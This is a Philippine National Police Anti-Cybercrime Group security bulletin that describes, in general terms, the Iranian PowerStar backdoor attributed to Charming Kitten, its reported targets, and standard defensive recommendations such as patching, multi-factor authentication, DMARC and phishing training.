Republic of the Philippines
National Police Commission
PHILIPPINE NATIONAL POLICE
ANTI-CYBERCRIME GROUP
Camp BGen Rafael T Crame, Quezon City
E-mail: This email address is being protected from spambots. You need JavaScript enabled to view it.

ACG-CYBER SECURITY BULLETIN NR 305: Charming Kitten’s PowerStar Backdoor Malware Evolves with Advanced Techniques

Reference Number ACG-CSB ACG-CSB 072723305

   The following information was obtained from different cyber security sources for notification to all parties concerned pursuant to the mandate of the Philippine National Police Anti-Cybercrime Group (PNP ACG) and classified as “Restricted” pursuant to the PNP Regulation 200-012 on Document Security and Impact Rating as high based on PNP Information Communication Technology (ICT) Security Manual s.2010-01 p. 22 and p.129.

SUMMARY

In recent years, Iranian hackers have become increasingly sophisticated in their cyber-attacks. One of the most dangerous tool in their arsenal is the PowerStar Backdoor malware. This malware is designed to infiltrate critical infrastructure systems and steal sensitive data.

This new version of the malware show how Charming Kitten is always working to improve its strategies and remain undetected. It highlights the need for stringent cybersecurity measures to be implemented to counter these sophisticated threats.

The PowerStar Backdoor malware is a Remote Access Trojan (RAT) that allows hackers to gain unauthorized access to a system and steal sensitive data. The malware is typically delivered via spear-phishing emails or by exploiting vulnerabilities in software. Once the malware infects a system, it creates a backdoor that allows the hacker to remotely control the system. The hacker can then steal sensitive data, install additional malware, or use the system to launch further attacks.

PowerStar variant adds new features such as the ability to remotely execute PowerShell and C# commands, establish persistence via various methods, dynamically update configurations, use multiple Command and Control (C2) channels, and conduct system reconnaissance and monitoring of existing persistence mechanisms.

The PowerStar Backdoor malware is designed to be stealthy and difficult to detect. It uses a variety of techniques to evade detection, including encrypting its communications, using anti-debugging techniques, and hiding its files and processes. The malware is typically delivered via emails that contain a malicious attachment or link. When the user clicks on the attachment or link, the malware is downloaded and installed on their system.

Iranian hackers have been using the PowerStar Backdoor malware to target critical infrastructure systems, including those in the energy, water, and transportation sectors. In one recent attack, Iranian hackers used the PowerStar Backdoor malware to target a water treatment plant in Israel. The hackers were able to gain access to the plant’s control systems and manipulate the water treatment process. Fortunately, the attack was detected before any damage was done.

In conclusion, the PowerStar Backdoor malware is a dangerous tool that is being used by Iranian hackers to target critical infrastructure systems. The malware is designed to be stealthy and difficult to detect, making it a serious threat to organizations that rely on critical infrastructure. To protect against this threat, it is essential to take steps to secure your systems, including keeping your software up-to-date, using strong password combination, and training your employees to recognize and avoid phishing attacks. By taking these steps, you can reduce the risk of falling victim to cyber-attacks and keep your sensitive data safe and secure.

RECOMMENDATION

The public is advised to follow these tips to understand the risk of Charming Kitten’s PowerStar Backdoor Malware:

• Run a malware scan;
• Filter Your Email and Implement Anti-Phishing Protection;
• Keep Your Systems Up-To-Date With the Latest Security Patches;
• Encrypt Any Sensitive Company Information You Have;
• Conduct Multi-Factor Authentication;
• Use Domain-based Message Authentication, Reporting & Conformance (DMARC) Technology;
• Run Frequent Backups;
• Conduct Email Security Training for Employees; and
• Be Wary of Suspicious Emails.

For additional information, please refer to the following websites:

• https://cyberpedia.medium.com/powerstar-backdoor-how-iranian-hackers-are-using-this-malware-to-target-critical-infrastructure-ad5178da58fe
• https://heimdalsecurity.com/blog/charming-kittens-powerstar-malware-boosts-its-techniques/
• https://www.msp360.com/resources/blog/spear-phishing-prevention/

POINT OF CONTACT  

Please contact PMAJ LESLIE P JALLORINA, Police Community Relations Officer, thru e-mail address This email address is being protected from spambots. You need JavaScript enabled to view it. or contact us on telephone number (632) 723-0401 local 7483 for any inquiries related to this CYBER SECURITY BULLETIN.